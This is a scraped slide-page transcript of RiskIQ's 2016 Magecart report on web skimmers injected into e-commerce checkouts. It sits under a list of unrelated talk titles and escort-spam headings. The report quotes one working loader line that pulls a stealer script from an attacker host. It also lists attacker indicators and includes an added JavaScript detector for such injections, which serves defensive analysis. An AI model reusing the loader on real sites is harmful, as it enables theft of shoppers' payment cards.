ODSC - Batch to Stream workshop - integration of Apache Spark, Cassandra, Pos...
ODSC - Batch to Stream workshop - integration of Apache Spark, Cassandra, Pos...ODSC - Batch to Stream workshop - integration of Apache Spark, Cassandra, Pos...
ODSC - Batch to Stream workshop - integration of Apache Spark, Cassandra, Pos...
 
React Server Component in Next.js by Hanief Utama
React Server Component in Next.js by Hanief UtamaReact Server Component in Next.js by Hanief Utama
React Server Component in Next.js by Hanief Utama
 
Automate your Kamailio Test Calls - Kamailio World 2024
Automate your Kamailio Test Calls - Kamailio World 2024Automate your Kamailio Test Calls - Kamailio World 2024
Automate your Kamailio Test Calls - Kamailio World 2024
 
EY_Graph Database Powered Sustainability
EY_Graph Database Powered SustainabilityEY_Graph Database Powered Sustainability
EY_Graph Database Powered Sustainability
 
Alluxio Monthly Webinar | Cloud-Native Model Training on Distributed Data
Alluxio Monthly Webinar | Cloud-Native Model Training on Distributed DataAlluxio Monthly Webinar | Cloud-Native Model Training on Distributed Data
Alluxio Monthly Webinar | Cloud-Native Model Training on Distributed Data
 
Dealing with Cultural Dispersion — Stefano Lambiase — ICSE-SEIS 2024
Dealing with Cultural Dispersion — Stefano Lambiase — ICSE-SEIS 2024Dealing with Cultural Dispersion — Stefano Lambiase — ICSE-SEIS 2024
Dealing with Cultural Dispersion — Stefano Lambiase — ICSE-SEIS 2024
 
Cloud Data Center Network Construction - IEEE
Cloud Data Center Network Construction - IEEECloud Data Center Network Construction - IEEE
Cloud Data Center Network Construction - IEEE
 
Call Girls In Mukherjee Nagar 📱 9999965857 🤩 Delhi 🫦 HOT AND SEXY VVIP 🍎 SE...
Call Girls In Mukherjee Nagar 📱  9999965857  🤩 Delhi 🫦 HOT AND SEXY VVIP 🍎 SE...Call Girls In Mukherjee Nagar 📱  9999965857  🤩 Delhi 🫦 HOT AND SEXY VVIP 🍎 SE...
Call Girls In Mukherjee Nagar 📱 9999965857 🤩 Delhi 🫦 HOT AND SEXY VVIP 🍎 SE...
 
Russian Call Girls in Karol Bagh Aasnvi ➡️ 8264348440 💋📞 Independent Escort S...
Russian Call Girls in Karol Bagh Aasnvi ➡️ 8264348440 💋📞 Independent Escort S...Russian Call Girls in Karol Bagh Aasnvi ➡️ 8264348440 💋📞 Independent Escort S...
Russian Call Girls in Karol Bagh Aasnvi ➡️ 8264348440 💋📞 Independent Escort S...
 
Building Real-Time Data Pipelines: Stream & Batch Processing workshop Slide
Building Real-Time Data Pipelines: Stream & Batch Processing workshop SlideBuilding Real-Time Data Pipelines: Stream & Batch Processing workshop Slide
Building Real-Time Data Pipelines: Stream & Batch Processing workshop Slide
 
Salesforce Certified Field Service Consultant
Salesforce Certified Field Service ConsultantSalesforce Certified Field Service Consultant
Salesforce Certified Field Service Consultant
 
Cloud Management Software Platforms: OpenStack
Cloud Management Software Platforms: OpenStackCloud Management Software Platforms: OpenStack
Cloud Management Software Platforms: OpenStack
 
GOING AOT WITH GRAALVM – DEVOXX GREECE.pdf
GOING AOT WITH GRAALVM – DEVOXX GREECE.pdfGOING AOT WITH GRAALVM – DEVOXX GREECE.pdf
GOING AOT WITH GRAALVM – DEVOXX GREECE.pdf
 
(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...
(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...
(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...
 
Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...
Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...
Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...
 
Unveiling Design Patterns: A Visual Guide with UML Diagrams
Unveiling Design Patterns: A Visual Guide with UML DiagramsUnveiling Design Patterns: A Visual Guide with UML Diagrams
Unveiling Design Patterns: A Visual Guide with UML Diagrams
 
chapter--4-software-project-planning.ppt
chapter--4-software-project-planning.pptchapter--4-software-project-planning.ppt
chapter--4-software-project-planning.ppt
 

Compromised e commerce_sites_lead_to_web-based_keyloggers

  • 1. RiskIQ Research: Compromised eCommerce Sites Lead to Web-Based Keyloggers

Most methods used by attackers to target consumers are commonplace, such as phishing and the use of malware to target payment cards. Others, such as POS (point of sale) malware, tend to be rarer and isolated to certain industries. However, some methods are downright obscure—a recently observed instance of threat actors injecting a keylogger directly into a website is one of these.

Targeting Consumers Via Retailer Payment Platforms

Since the widely publicized breach of Target Corporation, there has been a significant increase in awareness of activity surrounding POS (point of sale) system breaches. But web-based keylogger injection incidents continue to be little-known, even though they've been occurring for even longer than threats related to many high-profile breaches.

In 2000, the discovery of a vulnerability in versions of the widely-deployed Cart32 software, which enables consumers to shop online, gave threat actors access to the application as the administrator so they could dump credit card data and run commands on the hosting server. In 2007, discussions like this in the OSCommerce community illustrated more instances. Later in 2011, analysis showed additional mass compromise activity in OSCommerce pushing online store visitors to information-stealing malware.

Since then, this kind of activity increased, affecting other popular shopping cart software implementations.

● https://www.atwix.com/magento/credit-card-numbers-leak/
● http://www.snapfast.com/blog/magento-mage-jpg-hack/
● https://blog.sucuri.net/2015/04/impacts-of-a-hack-on-a-magento-ecommerce-website.html
● https://blog.sucuri.net/2015/06/magento-platform-targeted-by-credit-card-scrapers.html
● https://blog.sucuri.net/2016/06/magento-credit-card-stealer-braintree-extension.html

2016 Magecart injections

In 2016, the trend continues. Numerous hacked eCommerce websites appear to be affected by a new compromise that injects JavaScript code into the site, which allows attackers to capture payment card information. RiskIQ has observed this campaign ranging back to at least March 2016, with new attacker infrastructure rolling out steadily since then. Public analysis of aspects of the activity was shared in June by Sucuri.
  • 2. RiskIQ has termed this set of credit card stealer activity "Magecart" for tracking purposes. Through analysis of data in RiskIQ Security Intelligence Services and RiskIQ’s PassiveTotal, we’ve discovered that, although somewhat similar to other active credit card stealer operations, Magecart is significant for a few reasons.

1. Affected sites are hosted on multiple eCommerce platforms. At least the following technologies are explicitly seen to be impacted by this activity:
   ● Magento Commerce
   ● Powerfront CMS
   ● OpenCart

2. Multiple payment services provider linkages are targeted on affected sites as well, including:
   ● Braintree
   ● VeriSign payment processing

3. Formgrabber/credit card stealer content is hosted on remote attacker-operated sites, served over HTTPS. Stolen data is also exfiltrated to these sites using HTTPS.

4. Attackers have refined their malicious content over time, with identified samples in RiskIQ data showing evidence of:
   ● Testing and capabilities development
   ● Increased scope of targeting payment platforms
   ● Development and testing of enhancements
   ● Addition of obfuscation to hinder analysis and identification
   ● Attempts to hide behind brands of commonplace web technologies to blend in on compromised sites

5. The credit card stealer works in a very similar manner on the compromised web server as a banking trojan functions on a compromised victim workstation. Code is injected which can “hook” web forms and access data form submissions much like a formgrabber. Data is exfiltrated from the compromised server to a dropzone for attacker collection. There is also some indication in related payloads that attackers may be injecting bogus form fields into payment forms to solicit additional data from victims, similar to how webinjects operate when logged into a banking website from a compromised endpoint.

Further insight on the functionality of the stealers observed in this campaign is available from ClearSky Cybersecurity. We thank them for their assistance in analyzing and disclosing this threat activity.

An approximate timeline in observations from analyzed data provides the following insight:
  • 3.
1. March 2016: The domain statsdot.eu was registered, indicating possible early stages of the immediate Magecart campaign. Injections were simplistic and payloads were largely unobfuscated.

2. May 2016: An increase in activity was noted in RiskIQ data, with some emergence of obfuscation. An unusual two-stage form of payload delivery was observed (two domains used to serve the injection to site visitors). The addition of conditional activation of stealer scripts by targeted cart URLs (checkout pages, etc.) was observed.

3. June 2016: Activity peaked and RiskIQ observed domains with change of hosting to AS203624 DATAFLOWSU, a recognized Eastern European “bulletproof hoster” (hosting and network services provider operated by and catering to cybercriminal interests).

4. September 2016: Additional obfuscated script injections and remotely hosted JS were observed. At this time, activity is reduced but steady.

How Magecart Works

With RiskIQ’s crawling infrastructure, which captures the full sequence of events and page contents—including the Document Object Model (DOM), we can illustrate the operation of this campaign. The following sections present incidents on some affected websites.

www.faber.co.uk

In May 2016, RiskIQ observed the website of Faber and Faber, famed UK book publishing house, to be serving Magecart injections from their Magento site.
  • 4. The injection in the source of the site can be seen with a simple addition of a script tag.

When the injected web page on the merchant site is loaded, the malicious keylogger script is also loaded in the background. The keylogger script can access the browser session and submitted data.
  • 5. In this case, the attacker delivers the malicious credit card stealer script in two stages:

1. The injected URL verifies that the page the site visitor is on is a checkout URL where cardholder data will be entered. In the delivered code, it is visible, for example, that the Firecheckout extension for Magento is targeted.

2. If the test succeeds, the stealer script is loaded from the second stage script URL:

    if((new RegExp('onepage|checkout|onestep|firecheckout')).test(window.location)) {document.write('<script src="https://jquery-cdn.top/mage.js"></script>')};

The resulting stealer script as served in this incident is shown below:

The basic functionality of this script is to capture data from form fields and send the data to the remote URL using an AJAX call.

Looking into the hosting for this attacker infrastructure, we see the following components active at the time:

mageonline.net    108.61.188.71
jquery-cdn.top    45.32.153.108

45.32.153.108    AS20473 | US | AS-CHOOPA - Choopa LLC
108.61.188.71    AS20473 | US | AS-CHOOPA - Vultr Holdings LLC
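A defender-side check for the two behaviours described above (an external script tag pointing at a host the merchant never approved, and a first-stage script that only loads a second script on cart URLs), given as an added example that is not code from the RiskIQ report. The allowlist, the shop hostname and the sample page are constructed assumptions; the loader string is the one quoted above.

```javascript
// Added example: audit a crawled page and its fetched script bodies.
// ALLOWED_SCRIPT_HOSTS, SAMPLE_PAGE_URL and SAMPLE_HTML are constructed values.
const ALLOWED_SCRIPT_HOSTS = new Set(['code.jquery.com']);

// Library and platform names that blend in on shop pages. The report's
// attacker domains (jquery-cdn.top, angular.club, mage-js.link) follow this naming.
const BRAND_TOKENS = ['jquery', 'angular', 'mage', 'magento'];

// Cart-path keywords taken from the first-stage loader quoted in the report.
const CHECKOUT_TOKENS = ['onepage', 'checkout', 'onestep', 'firecheckout'];

// List external <script src> tags whose host is neither the page's own host
// nor on the allowlist, and mark hosts that borrow a library name.
function auditScriptTags(html, pageUrl) {
  const pageHost = new URL(pageUrl).hostname;
  const findings = [];
  const tagRe = /<script\b([^>]*)>/gi;
  let tag;
  while ((tag = tagRe.exec(html)) !== null) {
    const srcMatch = /(?:^|\s)src\s*=\s*["']?([^"'\s>]+)/i.exec(tag[1]);
    if (!srcMatch) continue; // inline script, nothing loaded remotely
    let host;
    try {
      // Resolves relative and protocol-relative sources against the page URL.
      host = new URL(srcMatch[1], pageUrl).hostname.toLowerCase();
    } catch (err) {
      findings.push({ src: srcMatch[1], host: null, reasons: ['unparseable-src'] });
      continue;
    }
    if (host === pageHost || ALLOWED_SCRIPT_HOSTS.has(host)) continue;
    const reasons = ['host-not-allowlisted'];
    const labels = host.split(/[.-]/);
    if (BRAND_TOKENS.some((t) => labels.includes(t))) {
      reasons.push('library-name-lookalike');
    }
    findings.push({ src: srcMatch[1], host, reasons });
  }
  return findings;
}

// Inspect the body of a fetched script for the two-stage pattern: a test of
// the current location against cart keywords that guards a script injection.
function analyzeScriptSource(js) {
  const lower = js.toLowerCase();
  const readsLocation = /\blocation\b|document\.url\b/.test(lower);
  const cartTokens = CHECKOUT_TOKENS.filter((t) => lower.includes(t));
  const injectsScript =
    /document\.write(?:ln)?\s*\([^)]*<script/.test(lower) ||
    /createelement\s*\(\s*["']script["']\s*\)/.test(lower);
  const gatedOnCheckout = readsLocation && cartTokens.length > 0;
  return {
    gatedOnCheckout,
    injectsScript,
    urls: js.match(/https?:\/\/[^\s"'<>\\)]+/g) || [],
    suspicious: gatedOnCheckout && injectsScript,
  };
}

// Constructed sample page: one same-origin script, one allowlisted CDN,
// one lookalike host (reserved .example TLD, not a real indicator).
const SAMPLE_PAGE_URL = 'https://www.example-shop.test/checkout/onepage/';
const SAMPLE_HTML = `
<html><head>
<script src="/js/prototype.js"></script>
<script type="text/javascript" src="https://code.jquery.com/jquery-1.12.4.min.js"></script>
<script src="https://jquery-cdn.example/stage1.js"></script>
</head><body></body></html>`;

// First-stage loader exactly as quoted in the report.
const REPORT_LOADER = `if((new RegExp('onepage|checkout|onestep|firecheckout')).test(window.location)) {document.write('<script src="https://jquery-cdn.top/mage.js"></script>')};`;

// Constructed benign script that mentions checkout but loads nothing.
const BENIGN_SCRIPT = `jQuery(function(){ jQuery('#checkout-form').validate(); });`;

console.log(auditScriptTags(SAMPLE_HTML, SAMPLE_PAGE_URL));
console.log(analyzeScriptSource(REPORT_LOADER));
```

The allowlist is the part that does the work: the name-lookalike flag only ranks findings, since an attacker can pick any hostname.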
  • 6. Domain registration data (domain, registrant date, registrar, nameserver domain(s), registrant name and email):

JQUERY-CDN.TOP    2016-05-09    PDR Ltd    bitcoin-dns.hosting    Ted    31338@mail.ru
MAGEONLINE.NET    2016-05-16    PDR LTD. D/B/A PUBLICDOMAINREGISTRY.COM    bitcoin-dns.hosting    Gregory    braun.security@yandex.com

Note

The domain jquery-cdn.top may sound familiar to readers. In 2014 a threat actor group used the domain jquery-cdn.com in a series of attacks against web sites, injecting malicious redirects into them to hijack visitor traffic to push victims to an instance of a crimeware exploit kit.

https://www.riskiq.com/blog/labs/jquerycom-malware-attack-puts-privileged-enterprise-it-accounts-at-risk/

This was a different attack campaign with different goals but illustrates a common technique in website hijacking where domain names and similar indicators are chosen with careful intent to allow attacker modifications and network traffic to blend in and avoid suspicion by onlookers. The names of popular JavaScript libraries are a common choice because of their presence on so many websites. A listing of Magecart domains and sampling of URLs is presented at the end of this report to illustrate how this concept influenced this attacker’s choice of naming their infrastructure.

A short time later in the month, RiskIQ observed the attack site serving slightly modified payloads:
  • 7. We believe this modification indicates work in progress on developing and enhancing the attacker’s code. You can see that commented sections were added to the file referencing form fields related to Braintree’s Magento module. Braintree is a payment processing service that may be snapped into the Magento platform to facilitate payment handling. The addition of this code may be an indication of development and expansion of cardholder data targeting by the attacker. We also note that the bottom of the file contains a call to console.log(), which aids the site visitor in debugging elements on the page.

Verifying the victim eCommerce site, in this case, we note that the site indeed included Braintree-related JavaScript libraries.

Opportunistic attackers may not always be able to predict the internals of how a compromised website handles details like payment processing and credit card handling. However, it's likely that upon access to multiple victim websites, threat actors realized they needed to add additional support for the variety of services used in the eCommerce space, leading to this on-the-fly development.

www.everlast.com

Later in May, we identified that the main site of clothing/fitness powerhouse Everlast Worldwide, Inc. was compromised and abused to steal credit card data by the same threat actors.
  • 8. As shown in the URL sequence from RiskIQ’s blacklist incident, the URL of the injected stealer script used the filename everlast.js, which may indicate that the attackers recognized a major brand at their disposal and took additional steps to attempt to have their malicious code blend in with site contents. This customization of script names to match victim sites is not common across much of the analyzed activity.
  • 9. Like that observed in other reported activity, the stealer code served in this instance is delivered in encoded or obfuscated form. RiskIQ believes this to be a commodity script packer, and we note that it is used in various capacities by multiple threat actors (observed in malicious website code injections, malicious traffic redirectors, etc.). A portion of the resultant decoded script library is shown below:

Resolution and domain data in this occurrence:

angular.club 108.61.211.216
108.61.211.216 AS20473 | US | AS-CHOOPA - Vultr Holdings LLC
ANGULAR.CLUB | 2016-05-15 | PDR Ltd. d/b/a PublicDomainRegistry.com | bitcoin-dns.hosting | Gregory | braun.security@yandex.com

shop.guess.net.au

In July, we observed another major fashion/lifestyle brand affected by the Magecart threat. The GUESS Australia online store was affected; notably, it is implemented not on Magento but on Powerfront CMS.
  • 10. As shown, the attacker appears to have adapted the name of the stealer script (/mage-asp.js) to, in part, reflect the technology on the underlying site: Powerfront CMS is implemented in ASP.

Stealer code:
  • 11. Significant in this case is that sometime before staging this attack, hosting for the malicious stealer scripts shifted to a different network provider (Dataflow) known for high amounts of threat activity and noted to be a bulletproof hosting provider, servicing criminal customers on a dedicated basis.

mage-js.link 80.87.205.143
80.87.205.143 AS203624 | RU | DATAFLOWSU - ICExpert Company Limited
MAGE-JS.LINK | 2016-06-09 | Gandi SAS | gandi.net | Farid Zeynalov | abuse@dataflow.su

www.rebeccaminkoff.com

More recently, on September 19, RiskIQ observed the Magento online store of fashion brand Rebecca Minkoff (apparel, handbags, more) affected by Magecart.
  • 13. 80.87.205.145 AS203624 | RU | DATAFLOWSU - ICExpert Company Limited
JS-SYST.SU | 2016-08-25 | REGRU-REG-FID | reg.ru | - | rudneva-y@mail.ua

RiskIQ notes a large portion of affected online merchants falling in the fashion and apparel category, believed to be in part because of the popularity of eCommerce in this space to extend storefronts to the Internet.

Conclusion and Guidance

As attackers focus on broadening capabilities to seize revenue opportunities, targets of cybercrime face an array of threats. eCommerce site owners must take every step necessary to secure their data and safeguard their payment card information. A bad experience at a retailer site may mean the loss of revenue as impacted users take their money elsewhere.

Because Magecart affects websites deployed on commodity CMS and eCommerce software technology, the implementations of which may be outsourced by merchants to third parties, both merchants and integrators must take active roles in ensuring secure environments for deployed sites. Here is RiskIQ’s guidance:

● Merchants should partner with integrators and contractors who can not only be verified to provide assurances of minimum compliance requirements but can also demonstrate transparency around the technologies they utilize and their processes for hardening eCommerce installations and maintaining sound security postures. It is important that merchants do not leave assurance of this as an assumption! Consider specific contract language focused on these key elements together with SLAs.
● eCommerce site administrators must ensure familiarity with and conformance to recommended security controls and best practices related to eCommerce, and particularly, the software packages utilized. All operating system software and web stack software must be kept up to date. It is critical to remain abreast of security advisories from the software developers and to ensure that appropriate patch application follows, not only for the core package but also for third-party plugins and related components. Examples of such resources for the Magento CMS include the following:
  ○ https://magento.com/security
  ○ https://magento.com/security/best-practices
● Site and system administrators should safeguard credentials used to access admin interfaces and underlying web hosting environments, and passwords should be changed regularly. Strong authentication schemes should be utilized where available to reduce the risk from stolen credentials. Multi-factor authentication or two-step verification options are commonplace and effective for this. Use of cryptographic keys and
  • 14. authentication tokens for access to remote hosting servers is recommended over traditional username and password logins.

End users are also at significant risk, as it is their payment data that is on the line when engaging in online sales. We recommend the following considerations for consumers:

● Carefully consider the online retailers whose sites you visit and to whom you submit payment data. Understand that at any given time, a portion of online retailers are compromised and present a risk that’s unknown to site owners. Without a high level of visibility and knowledge about attack techniques, it may be difficult to discern high-risk sites. Attempt to do business with merchants you believe are trustworthy and go to great lengths to protect customer data.
● Maintain secure configurations on all computers used to carry out online purchases. Any system used for online banking or eCommerce must be a known good or trusted endpoint. This applies to desktops, laptops, tablets, mobile phones, and even virtual machines. Public systems and kiosks should be avoided! Operating system and all application security updates should be up to date. Other security controls may be utilized to address specific risks, such as antivirus software or other endpoint solutions.
● An effective control that can prevent attacks such as Magecart is the use of web content whitelisting plugins such as NoScript (for Mozilla’s Firefox). These types of add-ons function by allowing the end user to specify which websites are “trusted” and by preventing the execution of scripts and other high-risk web content from sites that are not. Using such a tool, the malicious sites hosting the credit card stealer scripts would not be loaded by the browser, preventing the script logic from accessing payment card details.
  • 15. Data and indicators

You can download the indicator files here and here.

Attacker Domains

The following domains are observed serving malicious formgrabber code or are in some way closely related to observed domains (common hosting or other high-confidence reputational links). These domains were registered between March and August 2016.

  • 16. Attacker IP addresses

The following IP addresses are observed hosting formgrabber domains or are in some way closely related to observed addresses (common hosting or other high-confidence reputational links). These domains were registered between March and August 2016. These IPs are provided with associated routing AS data indicating likely provider of hosting or Internet service.

Sample URLs

The following data consists of a set of sample Magecart URLs observed injected into affected websites, sorted by an observed date of occurrence.

  • 17. Affected websites

The following data provides a list of affected websites observed to be serving script injections to known Magecart content hosting and data collection hosts over the observed timeframe. This information is extracted from RiskIQ crawl sequences and presented in the form of host pairs through PassiveTotal, our solution for investigators and responders exploring the Digital Footprints of malicious actors.